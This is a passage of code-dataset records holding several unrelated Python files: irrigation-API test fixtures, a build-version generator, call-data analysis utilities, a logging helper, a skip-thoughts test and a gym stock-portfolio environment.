"code-starcoder2", "pt": "13", "api": [{"api_name": "model.Net", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 29, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 30, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 30, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 36, "usage_type": "call"}, {"api_name": "dataset.xywh_to_x1y1x2y2", "line_number": 40, "usage_type": "call"}, {"api_name": "display.dis_gt", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "618119176", "text": "\"\"\"\nFile: fixtures.py\nAuthor: Aaron Bach\nEmail: bachya1208@gmail.com\nGithub: https://github.com/bachya/regenmaschine\n\"\"\"\n\n# -*- coding: utf-8 -*-\n# pylint: disable=redefined-outer-name\n\nimport pytest\n\n\n@pytest.fixture(scope='session')\ndef programs_nextrun_response_200():\n \"\"\" Fixture to return a successful local response \"\"\"\n return {'nextRuns': [{'pid': 1, 'startTime': '06:00'}]}\n\n\n@pytest.fixture(scope='session')\ndef programs_all_response_200(programs_get_response_200):\n \"\"\" Fixture to return a good set of /program data \"\"\"\n return {'programs': [programs_get_response_200]}\n\n\n@pytest.fixture(scope='session')\ndef programs_get_response_200():\n \"\"\" Fixture to return info on a single program \"\"\"\n return {\n 'uid':\n 1,\n 'name':\n 'Default Watering Schedule',\n 'active':\n True,\n 'startTime':\n '06:00',\n 'cycles':\n 0,\n 'soak':\n 0,\n 'cs_on':\n False,\n 'delay':\n 0,\n 'delay_on':\n False,\n 'status':\n 0,\n 'startTimeParams': {\n 'offsetSign': 0,\n 'type': 0,\n 'offsetMinutes': 0\n },\n 'frequency': {\n 'type': 0,\n 'param': '0'\n },\n 'coef':\n 0.0,\n 'ignoreInternetWeather':\n False,\n 'futureField1':\n 0,\n 'freq_modified':\n 0,\n 'useWaterSense':\n False,\n 'nextRun':\n '2017-06-26',\n 'startDate':\n '2017-05-29',\n 'endDate':\n None,\n 'yearlyRecurring':\n True,\n 'simulationExpired':\n False,\n 'wateringTimes': [{\n 'id': 1,\n 'order': 1,\n 'name': 'Backyard Landscaping',\n 'duration': 0,\n 'active': True,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 2,\n 'order': 2,\n 'name': 'Planter Box',\n 'duration': 0,\n 'active': True,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 3,\n 'order': 3,\n 'name': 'Zone 3',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 4,\n 'order': 4,\n 'name': 'Zone 4',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 5,\n 'order': 5,\n 'name': 'Zone 5',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 6,\n 'order': 6,\n 'name': 'Zone 6',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 7,\n 'order': 7,\n 'name': 'Zone 7',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 8,\n 'order': 8,\n 'name': 'Zone 8',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }]\n }\n\n\n@pytest.fixture(scope='session')\ndef programs_running_response_200():\n \"\"\" Fixture to return running programs \"\"\"\n return {\n 'programs': [{\n 'uid': 1,\n 'name': 'Default Watering Schedule',\n 'manual': True,\n 'userStartTime': '2017-06-26 16:12:00',\n 'realStartTime': '2017-06-26 16:12:55',\n 'status': 1\n }]\n }\n", "sub_path": "tests/fixtures/program.py", "file_name": "program.py", "file_ext": "py", "file_size_in_byte": 3790, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.fixture", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 147, "usage_type": "call"}]} +{"seq_id": "79837176", "text": "\"\"\"\nThis class is responsible for creating the Version.h file in the source directory\nand returning the version parameters used by the documentation generator\n\"\"\"\nimport os\nimport sys\nimport subprocess\nimport os.path\nimport shutil\nimport fileinput\nimport re\nimport time\nimport pytz\nfrom datetime import datetime, date\n\nimport Globals\n\nEX_OK = getattr(os, \"EX_OK\", 0)\n\nclass Version:\n\tdef __init__(self):\n\t\tprint(\"--> Starting Version Class\")\n\n\tdef create_version_header(self):\n\t\tprint(\"--> Creating Version.h from Git Information\")\n\n\t\tif Globals.git_path_ == '':\n\t\t\tprint(\"[WARNING] - No Git was found. Cannot create Version.h file\")\n\t\t\treturn True\n\n\t\tp = subprocess.Popen(['git', '--no-pager', 'log', '-n', '1', '--pretty=format:%H%n%h%n%ci'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\tout, err = p.communicate()\n\t\tlines = out.decode('utf-8').split('\\n')\n\t\tif len(lines) != 3:\n\t\t\treturn Globals.PrintError('Format printed by GIT did not meet expectations. Expected 3 lines but got ' + str(len(lines)))\n\n\t\ttime_pieces = lines[2].split(' ')\n\t\ttemp = ' '.join(time_pieces)\n\t\tlocal_time = datetime.strptime(temp, '%Y-%m-%d %H:%M:%S %z')\n\t\tutc_time = local_time.astimezone(pytz.utc)\n\t\t\n\t\t# Build the Version.h file\n\t\tprint('-- Build SPM/Source/Version.h with Git log information')\n\t\tversion = '// This file is automatically built by the build system. Do not modify this file\\n'\n\t\tversion += '#ifndef VERSION_H_\\n'\n\t\tversion += '#define VERSION_H_\\n'\n\t\tversion += '#define VERSION \"' + Globals.SPM_version_number + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_DATE \"' + utc_time.strftime('%Y-%m-%d') + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_YEAR \"' + utc_time.strftime('%Y') + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_MONTH \"' + utc_time.strftime('%B') + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_TIME \"' + utc_time.strftime('%H:%M:%S') + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_VERSION \"' + utc_time.strftime('%Y-%m-%d %H:%M:%S %Z') + '\"\\n'\n\t\tversion += '#endif\\n'\n\t\tfile_output = open(Globals.root_directory_ + '/Source/Version.h', 'w')\n\t\tfile_output.write(version)\n\t\tfile_output.close()\n\t\t\n\t\t# Build the Version.tex file\n\t\tprint('-- Build SPM/Documention/Manual/version.tex with Git log information')\n\t\tversion = '% WARNING: THIS FILE IS AUTOMATICALLY GENERATED BY doBuild documentation. DO NOT EDIT THIS FILE\\n'\n\t\tversion += '\\\\newcommand{\\\\VERSION}{' + Globals.SPM_version_number + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlDateDoc}{' + utc_time.strftime('%Y-%m-%d') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlYearDoc}{' + utc_time.strftime('%Y') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlMonthDoc}{' + utc_time.strftime('%B') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlTimeDoc}{' + utc_time.strftime('%H:%M:%S') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlShortVersionDoc}{' + utc_time.strftime('%Y-%m-%d') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlVersionDoc}{' + utc_time.strftime('%Y-%m-%d %H:%M:%S %Z') + '}\\n'\n\t\tfile_output = open(Globals.root_directory_ + '/Documentation/Manual/Version.tex', 'w')\n\t\tfile_output.write(version)\n\t\tfile_output.close()\n # Build SPNversion.tex for use with syntax files\n\t\tSPMversion = Globals.SPM_version_number + '-' + utc_time.strftime('%Y-%m-%d')\n\t\tfile_output = open(Globals.root_directory_ + '/Documentation/Manual/SPMversion.tex', 'w')\n\t\tfile_output.write(SPMversion)\n\t\tfile_output.close()\n\t\t\t\t\n\t\t# Build the Version.R file\n\t\tprint('-- Build SPM/RLibrary/version.R with Git log information')\n\t\tversion = '# WARNING: THIS FILE IS AUTOMATICALLY GENERATED BY doBuild documentation. DO NOT EDIT THIS FILE\\n'\n\t\tversion += 'version.number<-\"' + Globals.SPM_version_number + '\"\\n'\n\t\tversion += 'version.date<-\"' + utc_time.strftime('%Y-%m-%d') + '\"\\n'\n\t\tfile_output = open(Globals.root_directory_ + '/R-libraries/Version.R', 'w')\n\t\tfile_output.write(version)\n\t\tfile_output.close()\n\n\t\t# Build the Version.nsi file\n\t\tprint('-- Build SPM/installer/version.nsi with Git log information')\n\t\tversion = '# WARNING: THIS FILE IS AUTOMATICALLY GENERATED BY doBuild documentation. DO NOT EDIT THIS FILE\\n'\n\t\tversion += '!define PRODUCT_VERSION \"' + Globals.SPM_version_number + \"-\" + utc_time.strftime('%Y-%m-%d') + '\"\\n'\n\t\tfile_output = open(Globals.root_directory_ + '/installer/Version.nsi', 'w')\n\t\tfile_output.write(version)\n\t\tfile_output.close()\n\n\t\tprint('-- Version updated')\n\t\t\n\t\treturn True\n\t\t\n\t\n", "sub_path": "BuildSystem/buildtools/classes/Version.py", "file_name": "Version.py", "file_ext": "py", "file_size_in_byte": 4396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "Globals.git_path_", "line_number": 27, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 31, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "Globals.PrintError", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "name"}, {"api_name": "pytz.utc", "line_number": 40, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 47, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 54, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 61, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 68, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 72, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 73, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 80, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 82, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 89, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 90, "usage_type": "attribute"}]} +{"seq_id": "350683506", "text": "import datetime\nimport tabulate\nimport logging\nimport sys\nimport webbrowser\n\nfrom . import matrix as matrixFile\n\n\nclass _AnsiColorizer(object):\n _colors = dict(black=30, red=31, green=32, yellow=33,\n blue=34, magenta=35, cyan=36, white=37)\n\n def __init__(self, stream):\n self.stream = stream\n\n @classmethod\n def supported(cls, stream=sys.stdout):\n if not stream.isatty():\n return False # auto color only on TTYs\n try:\n import curses\n except ImportError:\n return False\n else:\n try:\n try:\n return curses.tigetnum(\"colors\") > 2\n except curses.error:\n curses.setupterm()\n return curses.tigetnum(\"colors\") > 2\n except:\n raise\n # guess false in case of error\n return False\n\n def write(self, text, color):\n \"\"\"\n Write the given text to the stream in the given color.\n \"\"\"\n color = self._colors[color]\n self.stream.write('\\x1b[{}m{}\\x1b[0m'.format(color, text))\n\n\nclass ColorHandler(logging.StreamHandler):\n def __init__(self, stream=sys.stderr):\n super(ColorHandler, self).__init__(_AnsiColorizer(stream))\n\n def emit(self, record):\n msg_colors = {\n logging.DEBUG: (\"Debug\", \"green\"),\n logging.INFO: (\"Info\", \"blue\"),\n logging.WARNING: (\"Warning\", \"yellow\"),\n logging.ERROR: (\"Error\", \"red\")\n }\n\n header, color = msg_colors.get(record.levelno, \"blue\")\n if 'prefix' in record.__dict__:\n header = record.prefix\n else:\n header = header + ':'\n self.stream.write(\"{} {}\\n\".format(header, record.msg), color)\n\n\ndef get_weighted_edge_list(edge_list, directed):\n weighted_edge_list = []\n\n if not directed:\n # only the connections are cared.\n # return a list of lists of [user1,use2,number_of_connections]\n for edge in edge_list:\n count = edge_list.count(edge)\n reversed_edge = edge.copy()\n reversed_edge.reverse()\n r_count = edge_list.count(reversed_edge)\n weight = count + r_count\n weighted_edge = edge.copy()\n weighted_edge.append(weight)\n\n not_added = True\n for i in weighted_edge_list:\n if (edge == [i[0], i[1]]) or (reversed_edge == [i[0], i[1]]):\n not_added = False\n break\n if not_added:\n weighted_edge_list.append(weighted_edge)\n\n return weighted_edge_list\n if directed:\n # return a list of lists of [user1,use2,number_of_connections]\n for edge in edge_list:\n weight = edge_list.count(edge)\n weighted_edge = edge.copy()\n weighted_edge.append(weight)\n\n not_added = True\n for i in weighted_edge_list:\n if edge == [i[0], i[1]]:\n not_added = False\n break\n if not_added:\n weighted_edge_list.append(weighted_edge)\n\n return weighted_edge_list\n\n\ndef print_matrix(matrix, headers):\n print('matrix : ', matrix)\n print('header : ', headers)\n if len(matrix) > 10:\n print(\"Matrix Length : \", len(matrix))\n html = \"\"\"\n \n \n

Connection Matrix

\n
\n {table}\n \n \n \"\"\"\n table = tabulate.tabulate(matrix, headers=headers, tablefmt='html', stralign='center')\n print('table : ', table)\n b = table.encode('utf-8')\n f = open('connection_matrix.html', 'wb')\n f.write(b)\n f.close()\n webbrowser.open_new_tab('connection_matrix.html')\n else:\n print(\">> connection matrix\")\n print(tabulate.tabulate(matrix, headers=headers, tablefmt='pretty'))\n\n\ndef print_matrix_new(matrix, headers):\n if len(matrix) > 0:\n print(\"Matrix Length : \", len(matrix))\n html_tag = matrixFile.matrix_html_head\n table_header = create_header(headers)\n table_body = create_rows(matrix)\n html_tag += ' \\n {} \\n {} \\n
\\n \\n'.format(table_header, table_body)\n f = open('outputs\\\\connection_matrix.html', 'w')\n f.write(html_tag)\n f.close()\n webbrowser.open_new_tab('outputs\\\\connection_matrix.html')\n\n\ndef create_rows(matrix, text_align='center'):\n row_tag_list = ''\n for each_row in matrix:\n if each_row[0] != '':\n each_row_tag = ''\n for each_row_item in each_row:\n if each_row_item == each_row[0]:\n each_row_items = ' {} '.format(text_align, each_row_item)\n else:\n each_row_items = ' {} '.format(text_align, each_row_item)\n each_row_tag += each_row_items\n each_row_tag_end = each_row_tag + ' \\n'\n row_tag_list += each_row_tag_end\n row_tag_list_end = row_tag_list + ''\n return row_tag_list_end\n\n\ndef create_header(headers, text_align='center'):\n new_tag = ' \\n '\n for each_header in headers:\n tag = ' {} '.format(text_align, each_header)\n new_tag += tag\n tag_end = new_tag + ' \\n '\n return tag_end\n\n\ndef get_datetime_from_timestamp(timestamp):\n timestamp.strip()\n day, month, date, time, zone, year = timestamp.split()\n date, month, year = map(int, [date, month_string_to_number(month), year])\n hour, minute, sec = map(int, time.strip().split(\":\"))\n dt = datetime.datetime(year, month, date, hour, minute, sec)\n return dt\n\n\ndef month_string_to_number(string):\n m = {\n 'jan': 1,\n 'feb': 2,\n 'mar': 3,\n 'apr': 4,\n 'may': 5,\n 'jun': 6,\n 'jul': 7,\n 'aug': 8,\n 'sep': 9,\n 'oct': 10,\n 'nov': 11,\n 'dec': 12\n }\n s = string.strip()[:3].lower()\n\n try:\n out = m[s]\n return out\n except ValueError:\n raise ValueError('Not a month')\n\n\ndef get_index_of_day(string):\n d = {\n 'Mon': 1,\n 'Tue': 2,\n 'Wed': 3,\n 'Thu': 4,\n 'Fri': 5,\n 'Sat': 6,\n 'Sun': 7\n }\n day = string.split()[0]\n try:\n out = d[day]\n return out\n except ValueError:\n raise ValueError('Not a day')\n", "sub_path": "cellyzer/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 6624, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.stdout", "line_number": 18, "usage_type": "attribute"}, {"api_name": "curses.tigetnum", "line_number": 28, "usage_type": "call"}, {"api_name": "curses.error", "line_number": 29, "usage_type": "attribute"}, {"api_name": "curses.setupterm", "line_number": 30, "usage_type": "call"}, {"api_name": "curses.tigetnum", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 46, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 51, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 52, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 53, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tabulate.tabulate", "line_number": 121, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 127, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 130, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 143, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "302326182", "text": "#!/usr/bin/env python3\n#author:Alnk(李成果)\nimport logging\nfrom logging import DEBUG\n\n\ndef get_logger(log_file, log_msg):\n # 1.创建logger函数对象\n logger = logging.getLogger() # 这个参数是用户名字\n # 2.创建流对象:文件流fh,屏幕流ch\n fh = logging.FileHandler(log_file) # 写入日志文件\n # 3.创建日志格式:这里可以创建多个日志格式\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n # 4.流对象添加格式对象\n fh.setFormatter(formatter) # 文件流添加日志格式\n # 5.logger对象添加流对象\n logger.addHandler(fh)\n # 6.设置日志打印级别\n logger.setLevel(DEBUG) # 全局设置,同时设置文件流和屏幕流\n #\n logger.info(log_msg) # 打印INFO日志\n # 在记录日志之后移除句柄,不然会重复打印日志\n logger.removeHandler(fh)\n\n", "sub_path": "08 day08/03 作业 day08/atm/core/log.py", "file_name": "log.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 19, "usage_type": "argument"}]} +{"seq_id": "415146996", "text": "# -*- coding: utf-8 -*-\n\n# Created by junfeng on 3/28/16.\n\n# logging config\nimport logging\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\nimport skipthoughts\nmodel = skipthoughts.load_model()\n\nX = [\n 'Hello, skip thoughts',\n]\nvectors = skipthoughts.encode(model, X)\nprint(vectors)", "sub_path": "test_skipthoughts.py", "file_name": "test_skipthoughts.py", "file_ext": "py", "file_size_in_byte": 436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "skipthoughts.load_model", "line_number": 14, "usage_type": "call"}, {"api_name": "skipthoughts.encode", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "607141220", "text": "\"\"\"\nDefines the environment for portfolio management\n\"\"\"\n\nfrom collections import OrderedDict\nfrom pprint import pprint\n\nimport gym\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom gym import spaces\nfrom pytorch_pretrained_bert import BertTokenizer\nfrom torchlib.common import eps\n\ndate_format = '%Y-%m-%d'\n\n\ndef sharpe(returns, freq=30, rfr=0):\n \"\"\" Given a set of returns, calculates naive (rfr=0) sharpe (eq 28). \"\"\"\n return (np.sqrt(freq) * np.mean(returns - rfr + eps)) / np.std(returns - rfr + eps)\n\n\ndef max_drawdown(returns):\n \"\"\" Max drawdown. See https://www.investopedia.com/terms/m/maximum-drawdown-mdd.asp \"\"\"\n peak = returns.max()\n trough = returns[returns.idxmax():].min()\n return (trough - peak) / (peak + eps)\n\n\nclass StockObservation(object):\n \"\"\"\n A stock observation consists of previous day numeric, current day numeric and current day news\n \"\"\"\n\n def __init__(self, numeric, news, prev_numeric, current_date):\n self.prev_numeric = prev_numeric\n self.numeric = numeric\n self.news = news\n self.current_date = current_date\n\n def get_close_ratio(self):\n return self.numeric[:, -1] / self.prev_numeric[:, -1]\n\n def get_news(self):\n return self.news\n\n def get_current_date(self):\n return self.current_date\n\n\nclass DataGenerator(object):\n def __init__(self, pd_frame: OrderedDict, total_steps=260, start_date=None):\n \"\"\"\n\n Args:\n pd_frame: a dictionary of panda frame that provide stock price info and news or tweets.\n The key is the stock name.\n total_steps: total number of steps to simulate\n start_date: date to start simulation. Used to compare algorithms.\n \"\"\"\n self.pd_frame = pd_frame\n self.start_date = pd.Timestamp(start_date) if start_date else None\n any_stock_frame = pd_frame.get(list(pd_frame.keys())[0])\n self.date_index = any_stock_frame.index\n if total_steps > 0:\n self.total_steps = total_steps\n else:\n self.total_steps = self.date_index.size - 2\n self.earliest_record_date = pd.Timestamp(any_stock_frame.index.values[0])\n self.last_record_date = pd.Timestamp(any_stock_frame.index.values[-1])\n self.news_title = ['Top{}'.format(i + 1) for i in range(25)]\n\n if self.start_date and self.start_date not in self.date_index:\n raise ValueError('Start date not in date index. Must from {} to {} and must be weekdays'.format(\n self.earliest_record_date.strftime(date_format), self.last_record_date.strftime(date_format)))\n\n def _get_data_by_date(self, date):\n prices = []\n news = []\n for stock in self.pd_frame:\n current_frame = self.pd_frame[stock]\n line = current_frame.loc[date]\n open = line['Open']\n high = line['High']\n low = line['Low']\n close = line['Close']\n current_price = np.array([open, high, low, close])\n current_news = []\n for title in self.news_title:\n current_news.append(line[title])\n\n prices.append(current_price)\n news.append(current_news)\n\n prices = np.array(prices)\n return prices, news\n\n def _get_next_date(self):\n next_date = self.current_date + pd.Timedelta(days=1)\n while next_date not in self.date_index:\n if next_date > self.last_record_date:\n raise ValueError('Current date {} exceeds max date {}'.format(self.current_date,\n self.last_record_date))\n next_date += pd.Timedelta(days=1)\n return next_date\n\n def step(self):\n \"\"\"\n\n Returns: a data dictionary map from stock name to (open, high, low, close, Top1, ..., Top25)\n\n \"\"\"\n self.steps += 1\n self.current_date = self._get_next_date()\n if self.current_date == self.last_record_date or self.steps == self.total_steps:\n done = True\n else:\n done = False\n\n current_prices, current_news = self._get_data_by_date(self.current_date)\n obs = StockObservation(current_prices, current_news, self.prev_prices, self.current_date)\n self.prev_prices = current_prices.copy()\n return obs, done\n\n def reset(self):\n self.steps = 0\n if self.start_date:\n self.current_date = self.start_date\n else:\n idx = np.random.randint(low=0, high=self.date_index.size - self.total_steps - 1)\n self.current_date = self.date_index[idx] # random select\n\n prev_prices, _ = self._get_data_by_date(self.current_date)\n self.current_date = self._get_next_date()\n current_prices, current_news = self._get_data_by_date(self.current_date)\n obs = StockObservation(current_prices, current_news, prev_prices, self.current_date)\n self.prev_prices = current_prices.copy()\n return obs\n\n\nclass PortfolioSim(object):\n def __init__(self, asset_names=(), trading_cost=0.0025, time_cost=0.0, total_steps=260):\n self.asset_names = asset_names\n self.trading_cost = trading_cost\n self.time_cost = time_cost\n self.total_steps = total_steps\n\n def step(self, w1, y1):\n \"\"\"\n Step.\n w1 - new action of portfolio weights - e.g. [0.1,0.9,0.0]\n y1 - price relative vector also called return in this timestamp\n e.g. [1.0, 0.9, 1.1]\n Numbered equations are from https://arxiv.org/abs/1706.10059\n \"\"\"\n assert w1.shape == y1.shape, 'w1 and y1 must have the same shape.'\n assert y1[0] == 1.0, 'y1[0] must be 1'\n\n w0 = self.w0\n p0 = self.p0\n\n dw1 = (y1 * w0) / (np.dot(y1, w0) + eps) # (eq7) weights evolve into\n\n mu1 = self.trading_cost * (np.abs(dw1 - w0)).sum() # (eq16) cost to change portfolio\n\n assert mu1 < 1.0, 'Cost is larger than current holding'\n\n p1 = p0 * (1 - mu1) * np.dot(y1, w0) # (eq11) final portfolio value\n\n p1 = p1 * (1 - self.time_cost) # we can add a cost to holding\n\n rho1 = p1 / p0 - 1 # rate of returns\n r1 = np.log((p1 + eps) / (p0 + eps)) # log rate of return\n reward = r1 # (22) average logarithmic accumulated return\n # remember for next step\n self.p0 = p1\n\n # if we run out of money, we're done (losing all the money)\n done = p1 == 0\n\n self.w0 = w1 # remember the action for calculating reward at next timestamp\n\n info = {\n \"reward\": reward,\n \"log_return\": r1,\n \"portfolio_value\": p1,\n \"return\": y1.mean(),\n \"rate_of_return\": rho1,\n \"weights_mean\": w1.mean(),\n \"weights_std\": w1.std(),\n \"cost\": mu1,\n }\n self.infos.append(info)\n return reward, info, done\n\n def reset(self):\n self.infos = []\n self.p0 = 1.0\n self.w0 = np.array([1.0] + [0.0] * len(self.asset_names))\n\n\nclass PortfolioEnv(gym.Env):\n \"\"\"\n An environment for financial portfolio management.\n Financial portfolio management is the process of constant redistribution of a fund into different\n financial products.\n Based on [Jiang 2017](https://arxiv.org/abs/1706.10059)\n \"\"\"\n\n metadata = {'render.modes': ['human', 'ansi']}\n\n def __init__(self,\n pd_frame_dict,\n total_steps=260, # 1 years\n trading_cost=0.0025,\n time_cost=0.00,\n start_date=None\n ):\n \"\"\"\n An environment for financial portfolio management.\n Params:\n steps - steps in episode\n scale - scale data and each episode (except return)\n augment - fraction to randomly shift data by\n trading_cost - cost of trade as a fraction\n time_cost - cost of holding as a fraction\n window_length - how many past observations to return\n start_idx - The number of days from '2012-08-13' of the dataset\n sample_start_date - The start date sampling from the history\n \"\"\"\n self.num_stocks = len(pd_frame_dict.keys())\n\n self.src = DataGenerator(pd_frame_dict, total_steps=total_steps, start_date=start_date)\n\n self.sim = PortfolioSim(\n asset_names=pd_frame_dict.keys(),\n trading_cost=trading_cost,\n time_cost=time_cost,\n total_steps=total_steps)\n\n # openai gym attributes\n # action will be the portfolio weights from 0 to 1 for each asset\n self.action_space = gym.spaces.Box(\n 0, 1, shape=(self.num_stocks + 1,), dtype=np.float32) # include cash\n\n def step(self, action):\n \"\"\"\n Step the env.\n Actions should be portfolio [w0...]\n - Where wn is a portfolio weight from 0 to 1. The first is cash_bias\n - cn is the portfolio conversion weights see PortioSim._step for description\n \"\"\"\n if isinstance(action, list):\n action = np.array(action)\n\n assert isinstance(action, np.ndarray), 'Action must be a numpy array'\n\n np.testing.assert_almost_equal(\n action.shape,\n (len(self.sim.asset_names) + 1,)\n )\n\n # normalise just in case\n action = np.clip(action, 0, 1)\n\n weights = action # np.array([cash_bias] + list(action)) # [w0, w1...]\n weights /= (weights.sum() + eps)\n weights[0] += np.clip(1 - weights.sum(), 0, 1) # so if weights are all zeros we normalise to [1,0...]\n\n assert ((action >= 0) * (action <= 1)).all(), 'all action values should be between 0 and 1. Not %s' % action\n np.testing.assert_almost_equal(\n np.sum(weights), 1.0, 3, err_msg='weights should sum to 1. action=\"%s\"' % weights)\n\n observation, done1 = self.src.step()\n\n # relative price vector of last observation day (close/close)\n y1 = observation.get_close_ratio()\n y1 = np.insert(y1, 0, 1.)\n reward, info, done2 = self.sim.step(weights, y1)\n\n # calculate return for buy and hold a bit of each asset\n info['market_value'] = np.cumprod([inf[\"return\"] for inf in self.infos + [info]])[-1]\n # add dates\n info['date'] = self.current_date\n self.current_date = observation.get_current_date()\n\n self.infos.append(info)\n\n return observation, reward, done1 or done2, info\n\n def reset(self):\n self.infos = []\n self.sim.reset()\n observation = self.src.reset()\n self.current_date = observation.get_current_date()\n return observation\n\n def render(self, mode='human', close=False):\n if close:\n return\n if mode == 'ansi':\n pprint(self.infos[-1])\n elif mode == 'human':\n self.plot()\n\n def seed(self, seed=None):\n self.np_random_seed = seed\n\n def plot(self):\n # show a plot of portfolio vs mean market performance\n df_info = pd.DataFrame(self.infos)\n df_info.set_index('date', inplace=True)\n mdd = max_drawdown(df_info.rate_of_return + 1)\n sharpe_ratio = sharpe(df_info.rate_of_return)\n title = 'max_drawdown={: 2.2%} sharpe_ratio={: 2.4f}'.format(mdd, sharpe_ratio)\n df_info[[\"portfolio_value\", \"market_value\"]].plot(title=title, fig=plt.gcf(), rot=30)\n plt.show()\n\n\n# Observation wrapper for both price and news\nclass PortfolioEnvObsReshapeWrapper(gym.ObservationWrapper):\n def __init__(self, env: PortfolioEnv,\n tokenizer=BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True),\n max_seq_length=128):\n super(PortfolioEnvObsReshapeWrapper, self).__init__(env)\n self.num_news = 25\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n self.observation_space = spaces.Tuple((spaces.Box(-np.inf, np.inf, shape=(1,), dtype=np.float32),\n 